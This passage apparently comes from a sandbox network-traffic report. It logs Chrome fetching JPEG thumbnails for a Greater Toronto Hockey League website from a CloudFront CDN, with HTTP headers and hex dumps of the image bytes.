                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 00 06 07 08 09 ff c4 00 59 10 00 01 02 04 04 04 03 05 05 03 06 0a 06 08 06 03 01 02 03 00 04 05 11 06 12 21 31 07 13 41 51 08 22 61 14 32 71 81 91 15 23 42
                                                                                                                          Data Ascii: JFIF&&CC"Y!1AQ"a2q#B
                                                                                                                          2025-01-13 21:01:17 UTC615INData Raw: 98 8c 53 b1 8c c2 c4 b0 49 5a 1b 4a f2 97 14 7d 63 77 e2 c7 08 70 76 11 71 6f e0 c9 e9 86 a6 24 88 33 12 8f af 30 28 3b 29 37 d6 3e a3 c4 42 33 c8 f7 3f 99 47 0d 39 d2 75 16 c7 07 ac 55 c3 53 ae b0 b3 cc 24 d9 36 d2 d1 dc 7c 24 4c 15 71 ab 0a 37 ec f6 bb e6 ca ed e5 31 e7 da db 2a 5d 45 79 d3 a9 56 84 47 a0 7c 26 a1 e6 b8 d5 84 c3 4e 5f ef 8d d3 d7 dd 31 eb 83 d1 9e 57 1d 51 ee 4e 2c ca 87 38 bf 21 3a b5 65 2c 53 6c 9f 5b ae 26 4e 4e a9 6c 06 af e5 03 58 ad e3 24 d3 6c f1 5a 9d 2e 54 73 3b 20 3f 45 42 be e9 52 12 3f 8c 70 8e c6 6a 7a c1 bc ea 1a 4a 0a 50 2e 91 bc 43 15 60 da 9e 7d d7 2c 96 92 54 75 ec 22 2b b3 a0 bc ab ec 3a 46 9f 8d b1 0c 85 02 89 36 e4 d3 b6 7a 61 27 2a 6f b0 8d 1c f9 9a 64 8d 5d ec 47 5c 9e 9b 6d 4a 52 66 66 c8 1d ec 98 de 2a 34 e9 f9
                                                                                                                          Data Ascii: SIZJ}cwpvqo$30(;)7>B3?G9uUS$6|$Lq71*]EyVG|&N_1WQN,8!:e,Sl[&NNlX$lZ.Ts; ?EBR?pjzJP.C`},Tu"+:F6za'*od]G\mJRff*4
                                                                                                                          2025-01-13 21:01:17 UTC12792INData Raw: a1 b5 af 2d c8 d2 2d e8 52 79 52 5f 74 6a ad 47 c2 2a d8 96 54 c3 e9 6f 7d 75 f8 46 c0 c4 e3 52 8a e5 14 83 a5 84 65 99 63 f3 a9 53 a8 01 b4 7a 43 94 da 6c c2 65 1c 13 2d 2d 29 5a 4a 85 fa c6 ff 00 2b c1 9c 59 50 c2 ac e2 e9 37 a4 fd 92 61 be 6a 41 7a ca b7 c3 bc 69 74 f7 dd 43 73 4c 3e a2 a5 b4 4a 2d 7b 81 68 e7 0a 90 a8 da 8b bd 8d 38 4a 3a b4 6b 39 5b 43 8a 40 16 d6 3a 5f 87 24 ff 00 f8 e7 82 b9 5a ff 00 95 99 fe 31 cd 52 95 b8 fb 84 8d 01 3b f5 8e 9b e1 b1 59 38 ef 82 92 2c 3f ca cd 08 db 26 87 b5 bc 6a c9 22 b7 59 c3 b4 c4 4e ad 8f e4 93 05 c5 23 7b 67 46 91 e2 1c 75 86 15 52 ac cb e1 fa 2a 02 5a 96 6c 9c ea db d4 93 1e cc f1 cb 88 1e c3 58 9b 07 cc 72 5b 59 75 97 9b 50 3b 10 a5 a4 47 8f b1 2e 2e 4c 94 cb c6 4d 6d 29 e5 24 a1 6a 48 df d2 2c 5a d8 d4
                                                                                                                          Data Ascii: --RyR_tjG*To}uFRecSzCle--)ZJ+YP7ajAzitCsL>J-{h8J:k9[C@:_$Z1R;Y8,?&j"YN#{gFuR*ZlXr[YuP;G..LMm)$jH,Z
                                                                                                                          2025-01-13 21:01:17 UTC14754INData Raw: 70 48 3a 98 ed be 18 38 3f 2d c5 7c 5c e2 2a c5 49 a3 d1 dd 66 7a 70 27 77 ac 6e 86 be 0a 23 5f 40 63 f9 f3 52 c4 d7 ca 96 ac fe e9 4e b5 0e 03 c2 3c e2 ac af 18 c7 33 69 b7 7b eb a5 db dd bd 35 67 d0 9c 26 c9 97 c2 f4 76 09 fd dd 3e 5d 1f 46 d3 16 e4 e9 61 a1 ef 0d 25 09 4a 02 52 02 52 05 80 1d 20 43 96 d0 02 a3 de 3f 5e b4 56 3f cc 13 96 79 39 76 8f a7 44 d9 46 f0 a0 dc ef a4 06 50 47 bd 08 8b 27 73 78 19 1c 52 d2 93 94 1d 4e b0 e2 4f 97 58 8e 52 92 a8 24 82 93 6b c5 bd 88 3d 7b 9f 2c 2d c7 c6 01 36 02 c6 05 4a 04 f9 60 02 d4 ac 90 34 82 be 9b 43 79 94 0d 80 bd e3 09 b7 bc 60 51 6d 75 1d 3e 70 5b 08 6c ba 04 22 5e 27 42 93 16 e4 02 64 9b 25 43 bc 46 5a ae 0e 7d 8c 3f 30 e6 50 2e 22 ae a7 57 90 a5 49 3f 53 a8 3b ca 97 96 41 5a d4 7a 01 1d a1 a4 6e 44 9c
                                                                                                                          Data Ascii: pH:8?-|\*Ifzp'wn#_@cRN<3i{5g&v>]Fa%JRR C?^V?y9vDFPG'sxRNOXR$k={,-6J`4Cy`Qmu>p[l"^'Bd%CFZ}?0P."WI?S;AZznD
                                                                                                                          2025-01-13 21:01:17 UTC9000INData Raw: 03 44 ad 2e 24 6a 3e 57 8d 71 5e 20 24 e6 a6 9c 96 6e b9 4a 76 45 44 36 c2 83 4f 15 6b 71 65 05 22 c7 5e 96 30 79 90 d1 9e 21 c3 fe 17 78 a5 56 4c b3 b5 29 39 1c 3e d4 e3 a2 5a 5d c9 f9 b0 84 ba e9 07 c8 80 34 26 c0 e9 71 1d 8f 0e ff 00 83 8e b3 38 cd ab 3c 48 a7 32 f2 91 98 a6 5e 4d 4e 0d 7a 02 56 07 ce c6 3b 2d 6f 1c 61 7a d6 1f 6b 08 e2 59 ba 74 e5 31 b9 96 df 6a 56 61 c7 52 12 eb 6b 0a 04 00 80 46 53 a8 b1 b6 f1 32 bf 8e 96 f5 2d d4 61 de 27 d0 e8 73 6c 32 1d 94 49 68 b8 1d 74 1b e5 70 af 54 b4 46 87 28 cd d8 c4 6e 5d 86 ac 8d 57 81 3e 04 b0 ee 02 e2 5d 3f 1c cd e2 b9 99 f3 41 99 13 12 cd 2a 4f 94 1f 50 49 01 46 ea 25 36 55 cd b5 b8 b6 ba c7 b4 c3 97 dc c7 07 91 f1 15 81 e9 ac ca 4b d4 2a c8 aa 56 66 32 34 59 a4 ca b8 e0 5b 84 0f 28 51 02 e2 f7 b1 31
                                                                                                                          Data Ascii: D.$j>Wq^ $nJvED6Okqe"^0y!xVL)9>Z]4&q8<H2^MNzV;-oazkYt1jVaRkFS2-a'sl2IhtpTF(n]W>]?A*OPIF%6UK*Vf24Y[(Q1
                                                                                                                          2025-01-13 21:01:17 UTC1265INData Raw: cc 73 88 d0 28 45 29 6a 02 53 70 94 a4 0e d1 85 0d b9 e6 5b 49 bc 50 95 be 9d d4 a1 00 66 e6 01 f2 ad 5f 58 80 d8 94 84 e5 b7 2c 0e d0 21 21 26 e0 69 1a f8 9d 9b 07 55 af eb 0e 89 f9 81 bb 84 08 a0 be c8 95 d8 94 81 6e 90 85 b4 de fa 02 62 90 55 66 7f 3c 61 ac 3c 35 26 00 b9 53 2d e6 0b 4a 52 4f 5b c2 2e 5c 2d 59 c2 44 52 1a f3 a3 70 3e 90 eb 75 c7 48 ba 92 2d 00 59 2a 50 7b d6 17 81 f6 5f ea fe 91 5e aa f8 1e f2 4c 67 ed 10 fc a6 20 2a 13 50 2d b7 6c a9 11 86 a0 a3 e6 cd ac 53 34 a5 15 29 24 92 3b 43 a3 41 13 98 2d 05 55 c4 1b 85 41 a6 bc f8 19 42 84 52 9d e3 14 4e 5b c0 17 a8 c4 0f 58 82 7e 07 b4 38 71 0a d6 00 36 d2 28 e4 f5 70 a4 ea 08 31 1c df 98 a1 7d 01 31 b5 12 b3 63 4e 20 cb 70 ab 46 0c 42 8b dc a4 5a 28 d8 6d 0a 58 cc 90 62 60 61 90 de 8d a7 af
                                                                                                                          Data Ascii: s(E)jSp[IPf_X,!!&iUnbUf<a<5&S-JRO[.\-YDRp>uH-Y*P{_^Lg *P-lS4)$;CA-UABRN[X~8q6(p1}1cN pFBZ(mXb`a


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          47192.168.11.204985054.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC681OUTGET /app/uploads/gthl/2025/01/07211622/DECAAA-Title-1600x900-GTHL-Power-Rankings-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:16 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 28446
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Last-Modified: Wed, 08 Jan 2025 02:16:23 GMT
                                                                                                                          ETag: "63bd1e837569dda67bb8266e8faefb23"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 e0ed595b39732d9e9972db26854384ec.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: OuztAUN_yqdeUw8kWLxR284QqNfBdjPgZVSG9Fae7erYrc3pOCk0OQ==
                                                                                                                          2025-01-13 21:01:16 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 01 02 04 06 05 07 08 03 09 0a ff c4 00 5a 10 00 01 03 02 03 04 03 09 09 0b 07 0b 04 03 01 00 00 01 02 03 04 05 06 11 31 07 12 21 51 08 13 41 14 16 22 57 61 71 92 93 e1
                                                                                                                          Data Ascii: JFIF&&CC"Z1!QA"Waq
                                                                                                                          2025-01-13 21:01:17 UTC8192INData Raw: d4 2d a1 7b a5 bb 0c c2 8e b6 d1 61 7a 0b d6 20 ac bb ab 1b 4b 2c d4 cb 6d a2 6e f7 e3 49 3d 4a 35 5a d6 e7 9b 95 18 ec b2 53 c4 fe ea ee 25 a5 c6 3b 4d d9 d6 26 a2 45 58 2e 18 39 b3 31 dd 54 91 b5 e8 b5 32 f8 4c 49 1a d7 2b 17 f1 55 5a 99 a6 4b 97 12 68 d6 95 46 9d f6 0a d4 79 25 66 ac fa fa cf 12 50 2a a5 7d 32 a2 e5 f7 56 fd 68 66 62 5f c3 95 3f ab fb 28 61 50 fd ff 00 4d fa 56 7d 68 66 e2 5f c3 95 3f ab fb 28 76 a3 fe 9f 2f af 1f ed 91 cc 7f ce 47 ea bf bd 19 f8 67 67 f8 93 18 53 4d 57 64 82 17 c7 03 d2 37 ac 92 a3 17 7b 2c fb 4e 67 e0 47 1f 7f 33 a4 ff 00 b9 69 bc f4 7e fc 01 74 fe f8 df d8 43 b2 ae 57 2a 7b 55 2b ab 2a b7 ba b6 af 15 4e cf 29 f3 9c c7 48 31 98 6c 64 f0 f4 92 69 3b 2d 8e fb 97 59 fa 43 45 7c 18 e4 39 b6 43 43 34 c6 ce a2 94 a2 dc ad
                                                                                                                          Data Ascii: -{az K,mnI=J5ZS%;M&EX.91T2LI+UZKhFy%fP*}2Vhfb_?(aPMV}hf_?(v/GggSMWd7{,NgG3i~tCW*{U+*N)H1ldi;-YCE|9CC4
                                                                                                                          2025-01-13 21:01:17 UTC1173INData Raw: b5 38 bf 66 b6 ca 6b 85 34 b5 94 74 17 17 d4 53 b2 56 ba 48 51 ef 87 71 5e d4 5c db bd ba ec b3 d7 25 3a 63 68 fe ea 27 4a bc 7b 49 35 ba d9 7e b5 61 1a 59 d1 5a be f2 51 ee 4c 8d 5e c4 9a 45 7b 93 ce dc 94 f2 9d de f3 77 c4 17 2a 8b cd fa e9 57 71 af ab 7a c9 3d 55 54 ce 96 59 5c ba ab 9c e5 55 55 26 95 19 46 5a d2 65 67 51 38 ea c4 f8 d0 fd ff 00 4d fa 56 7d 68 66 e2 5f c3 95 3f ab fb 28 61 d0 22 ba e1 4c 8d 45 55 eb 5b c1 3c e8 66 62 5f c3 95 3f ab fb 28 76 a3 fe 9f 2f af 1f ed 91 ce 7f ce 47 ea bf bd 1d b3 b0 4b 8d be 9a d1 71 a5 a8 ae 82 29 9f 52 8f 6c 6f 91 11 ca d4 62 66 a8 8b c7 23 75 c7 35 74 b3 61 aa b6 43 53 13 dd b8 e5 c9 af 45 5f 8a a7 98 60 aa a9 a3 97 ae a5 9e 48 64 cb 2d e6 39 5a b9 79 d0 c8 75 f2 f4 f6 ab 1f 76 ab 73 5c 99 2a 2c ce c9 53
                                                                                                                          Data Ascii: 8fk4tSVHQq^\%:ch'J{I5~aYZQL^E{w*Wqz=UTY\UU&FZegQ8MV}hf_?(a"LEU[<fb_?(v/GKq)Rlobf#u5taCSE_`Hd-9Zyuvs\*,S
                                                                                                                          2025-01-13 21:01:17 UTC9000INData Raw: c5 cd 11 e9 aa 70 f9 0d 32 9e eb 73 a4 89 21 a5 b8 d4 c3 1a 71 46 47 2a b5 3e 64 2b 53 72 b8 56 b1 19 59 5d 51 3b 5a b9 a2 49 22 b9 11 79 f1 19 6e 49 2c ba bf 2b 09 dd 3d 96 b1 5d 2e f0 8d 47 4b 72 c5 83 af 86 d5 a8 9a 92 92 77 49 f1 f4 35 73 1c f4 86 c7 ee 96 c4 c0 96 fa 55 b8 53 24 d0 f5 9d 64 6b 2b 77 99 9b dd 96 69 9e 68 79 bc fb 53 57 d7 50 ef 2d 15 64 d0 6f e5 bd d5 bd 5b 9f 9f 23 7b 34 cb f9 ca 8a a5 ad 6b 3b fe fd 67 9a d0 ad 2a 7a 23 98 4b 1b c9 eb a9 45 c5 ab db 7b 4e eb d2 8e fd db 55 45 3c f8 56 4e a2 78 e4 dd 44 cf 75 c8 b9 78 6d 3e 3b 10 c5 94 55 38 5f de 4a ea e8 63 a9 a0 95 cd 8d 92 48 88 e7 44 be 12 2a 22 eb 92 aa a7 cc 74 5c f7 8b b5 54 4e 82 a6 e5 55 2c 6e d5 8f 95 ca 8b f2 2a 98 f4 f5 35 14 92 a4 f4 b3 c9 14 89 c1 1e c7 2b 55 3e 54 34
                                                                                                                          Data Ascii: p2s!qFG*>d+SrVY]Q;ZI"ynI,+=].GKrwI5sUS$dk+wihySWP-do[#{4k;g*z#KE{NUE<VNxDuxm>;U8_JcHD*"t\TNU,n*5+U>T4
                                                                                                                          2025-01-13 21:01:17 UTC1889INData Raw: 92 00 01 96 00 02 a0 00 00 28 00 00 00 00 00 02 80 87 10 dd 49 71 0d d4 16 0e d4 82 5d a9 01 92 00 05 40 00 00 0a 96 2a 09 40 00 09 00 02 ac 00 01 00 15 71 62 ae 00 84 d4 2e a1 35 0b a8 00 96 ea 41 2d d4 86 49 60 01 52 c0 87 68 49 0e d0 02 a0 00 00 00 00 00 00 00 00 00 00 c0 00 15 60 fb d3 32 91 cd 55 a9 95 cd 5c f8 22 19 54 fe f7 32 66 75 4e 7a bf 3c 93 3c ce 38 fa 53 ae 55 11 af 27 21 b3 46 b2 83 8a d5 5d bc 4c 15 29 6b 26 ee cc da 89 2d ec 99 e9 25 3b 9c fc f8 f2 fa cc 6a 99 a9 e4 6b 52 08 3a bc 97 8f 94 9b 8a 65 56 ff 00 2a 22 fd 06 31 6c 45 67 ad 28 59 5a fd 04 51 a6 b5 63 2b bf 58 28 5c a1 a8 6c a0 00 05 8c d4 ba cc 88 88 d8 e3 4c bc 86 44 15 93 4d 4b 34 ab ba 8f 66 99 21 c5 19 54 b5 11 c3 0c d1 bf 3f ba 26 49 92 1b b4 71 55 35 ed 39 6c b3 fb 8d 4a
                                                                                                                          Data Ascii: (Iq]@*@qb.5A-I`RhI`2U\"T2fuNz<<8SU'!F]L)k&-%;jkR:eV*"1lEg(YZQc+X(\lLDMK4f!T?&IqU59lJ


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          48192.168.11.204985154.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:16 UTC663OUTGET /app/uploads/gthl/2025/01/02124840/GTHL-Officials-1600x900-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:17 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 90825
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:17 GMT
                                                                                                                          Last-Modified: Thu, 02 Jan 2025 17:48:42 GMT
                                                                                                                          ETag: "7219e58173ff112fd7ed0bb3979b1eeb"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 07b0e28d0c589c8a26610bbc5dcd660a.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: JLPRlkbQ6YSt4qSpFe2AIX68S67sc8zfjRIP2QjuqpivuL2HE48naA==
                                                                                                                          2025-01-13 21:01:17 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 c5 00 c5 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 08 09 06 07 03 04 05 02 01 00 0a ff c4 00 5a 10 00 01 02 05 02 03 05 04 06 06 07 05 05 05 04 0b 01 02 03 00 04 05 06 11 07 21 08 12 31 09 13 41 51 61 14 22 71 81 32 42 91
                                                                                                                          Data Ascii: JFIFCC"Z!1AQa"q2B
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: a7 9a 58 d5 c0 c2 6a d7 4c b7 35 39 cc 16 a4 d5 90 26 47 9a c7 fc bf dd fa de 3b 75 eb 6a a7 13 3a 25 a2 0d 99 0b b2 ec 96 15 06 11 ca 8a 3d 35 02 62 6d 20 0d 92 5a 46 cd 0c 63 1c e5 22 02 9e 22 78 f9 bb 6f 47 26 2d 4d 1e 72 6a d7 b7 13 96 57 50 47 ea ea 13 a8 e9 ee 91 fe ee d9 f0 4a 7d fc 75 23 a4 08 33 53 2f 3e ea dc 79 f5 b8 e3 aa 2b 71 c2 a2 a5 2d 44 e4 a9 44 ee 49 f3 31 36 ce 4a ca 10 d1 0d 46 d6 a2 f6 9e dd b3 6a 72 57 4b ac 0a 7d 29 93 90 89 ba cb 8a 9a 7c 8f 03 dd 36 52 da 4f c5 4a 81 7f 52 b8 8f d6 9d 4c ad ca 57 6e 9d 41 ab 2a 66 44 1f 64 12 4e fb 1b 52 f9 3e f1 42 19 e5 00 9c 0d ce 4e 07 58 ae dd 77 91 3c c5 49 04 9e 51 ce 71 bc 68 3a ef 3a c0 ef 52 a1 e1 ca 47 48 60 63 85 32 79 56 c5 2f 8a be 23 a8 c8 4b 14 ed 69 ba 83 69 fa 21 d9 de f8 01 e1
                                                                                                                          Data Ascii: XjL59&G;uj:%=5bm ZFc""xoG&-MrjWPGJ}u#3S/>y+q-DDI16JFjrWK})|6ROJRLWnA*fDdNR>BNXw<IQqh::RGH`c2yV/#Kii!
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 87 d2 2a f5 f7 30 c9 4b b7 15 47 b9 65 44 6e 59 64 63 ec e6 27 ec 8b d8 41 68 2d e0 ac 2a b4 9d 41 c6 95 41 0e 06 08 ed 08 c5 a6 2f 92 b0 b0 4f d2 4c 2b de d3 eb 9c d4 f8 85 97 b7 bb e2 a6 e8 94 19 64 f2 78 21 6f 29 4e 2b e7 8e 58 67 4c 2f bb ac a3 d4 62 13 0f 18 37 9b 77 d7 13 77 dd 79 a7 39 e5 c5 40 c8 b0 73 b1 6e 5d 21 a1 8f 9a 4c 5c d3 00 94 87 85 4c cc af dc c0 e8 60 e6 ec b9 d2 ff 00 d3 57 d5 63 54 27 e5 f9 a5 ed c9 5f 65 94 52 86 de d4 f7 52 3e 08 07 fb d0 0a be b0 5c 00 43 9f e0 73 4d 86 9a 70 e1 6e 4b cc 4b 86 a7 eb c1 55 89 bd b0 a2 5d 39 40 3f 04 04 c2 93 26 15 63 98 44 07 46 c6 62 a6 e2 83 56 d8 d1 8d 16 b8 2f 7f d5 2e 75 96 04 b5 39 a7 3a 3b 36 e9 e5 6c 63 c4 02 79 8f a2 4c 5a eb 56 11 88 58 1d a7 5a da 9b 92 f7 a7 68 f5 16 68 ae 46 d8 1e d7
                                                                                                                          Data Ascii: *0KGeDnYdc'Ah-*AA/OL+dx!o)N+XgL/b7wwy9@sn]!L\L`WcT'_eRR>\CsMpnKKU]9@?&cDFbV/.u9:;6lcyLZVXZhhF
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 4f d3 1d e5 70 24 9c 78 43 2a ec a8 b8 0f e8 fd 46 b7 14 af a2 24 2a 08 03 e0 e3 67 1f 60 85 9a 92 a9 79 9e 52 7c 7a 88 3b bb 2d eb be cd ab 57 35 15 6e 72 9a 95 b6 b5 25 3e 65 97 90 af c1 46 00 e1 42 47 09 8b 6a fc fa 64 6d 69 66 c8 20 38 f0 27 27 c1 29 24 c2 ad d2 9e 26 2e 5d 2f af 4e a3 1f a5 6d 89 f9 b9 81 39 49 7b 05 a5 34 b7 14 49 6c 2b 60 70 7a 1d 8f 8f 9c 33 8e 20 79 85 ac c8 46 12 a2 c4 d1 18 3b e7 ba 30 92 e4 e6 4a 79 98 5a bd f1 9f 7a 3c dd b6 16 da e7 88 b5 2b 6b d6 07 31 b4 e8 36 0f a8 7b a4 76 32 79 19 0b ad 37 55 34 fd 26 d9 f4 4c 17 39 e4 fa c4 08 3e 88 cc d4 0b 32 6a b5 a5 95 3b cb 85 eb 8a 69 76 75 59 b5 ae bb 6b 37 85 b9 23 91 ef 96 52 ac a9 29 c7 d2 6c 1c 81 ba 72 22 b2 b0 9d fd 31 c2 9e a0 51 54 ae 77 29 33 f2 f3 c9 03 a8 49 28 39 1f
                                                                                                                          Data Ascii: Op$xC*F$*g`yR|z;-W5nr%>eFBGjdmif 8'')$&.]/Nm9I{4Il+`pz3 yF;0JyZz<+k16{v2y7U4&L9>2j;ivuYk7#R)lr"1QTw)3I(9
                                                                                                                          2025-01-13 21:01:17 UTC16384INData Raw: 26 6b 16 ce a9 df b7 7d 3e d8 a5 32 b7 1e 9b 79 28 38 07 dd 4e 77 3f 21 0c 6f 88 5e 1e ab 55 0d 06 b5 b4 aa c8 90 41 9b 5c f4 af 7e ac 61 28 4a 52 72 a3 1c 1e 04 b8 76 45 b9 4c 1a 93 73 49 8f 6f 9d 09 32 c8 5a 37 42 7a 88 31 ae aa ad 32 87 4b 35 6a b4 d3 32 d2 f2 a8 2e 2d d7 54 12 94 80 37 24 9e 90 ce 33 10 a4 62 12 df e2 13 4a 6c fe 18 34 42 5a da 65 6d ce 5d d7 5b 9e cc b7 d4 07 3b 6d 80 14 f2 d3 e5 b6 12 3c b9 a0 a9 ec fc a5 b7 4c e1 d2 9a b4 00 15 34 fb 8e ab 1e a4 c2 e6 e2 97 5c 57 ae 5a b9 37 5f 94 75 4a a2 53 73 23 4a 49 e8 5a 07 de 73 1f be ad fe 00 41 d1 d9 b7 a8 2d 57 74 d2 7a ce 75 c4 f7 d4 77 f2 91 e3 c8 ad c4 33 46 0a 3c 04 64 cb ab 93 73 e1 02 07 69 cd 65 f6 b4 04 48 b2 e6 13 35 56 95 43 9f c2 09 57 e2 04 17 0f be 94 20 81 03 6f 1a 76 3a f5
                                                                                                                          Data Ascii: &k}>2y(8Nw?!o^UA\~a(JRrvELsIo2Z7Bz12K5j2.-T7$3bJl4BZem][;m<L4\WZ7_uJSs#JIZsA-Wtzuw3F<dsieH5VCW ov:
                                                                                                                          2025-01-13 21:01:17 UTC13621INData Raw: 75 fe 9c 69 3a df 7f d3 54 8e 4f 67 b9 2a 09 c7 88 05 e5 28 7d c4 45 72 b5 72 ec 0c 44 d2 11 35 d9 d1 30 a6 38 a0 a2 a0 2b 01 ea 65 45 b2 33 d7 f5 59 fc a1 bc ad be fe 51 e6 4f fc 46 d4 8f b4 11 09 e3 b3 e9 d0 df 14 f6 ae 12 7d f6 27 d1 91 e1 99 75 7f a4 38 b9 5d ca 01 fd a1 11 c8 04 80 eb 2c 19 6a a4 ec a6 70 a4 4c 3a d1 07 d1 64 7e 50 dd ad 9a 8b ba 8f c0 7b 33 6d 92 e4 c4 dd 81 31 2c af 12 5c 6a 59 6d 9f bd b8 53 fa 89 2c 8a 7d ff 00 73 4a 0d bb 9a cc f2 00 c7 94 c3 82 1a 17 67 65 55 9b b7 85 96 ad c9 b5 07 13 4f a8 54 69 4e a4 9c e1 b7 0f 3e 3f ba e9 82 48 23 08 4a 4e e5 44 14 28 93 ba 41 df e1 1b ce 72 bd 47 9b 68 ee 4b 60 8f 91 cc 74 b5 2a d5 9a b1 ef 4a ed a1 36 85 25 da 35 4a 66 41 79 18 3f aa 71 49 1f 70 1f 6c 6a db 32 6f d6 5d 72 9f 2f bb 8e 4b
                                                                                                                          Data Ascii: ui:TOg*(}ErrD508+eE3YQOF}'u8],jpL:d~P{3m1,\jYmS,}sJgeUOTiN>?H#JND(ArGhK`t*J6%5JfAy?qIplj2o]r/K
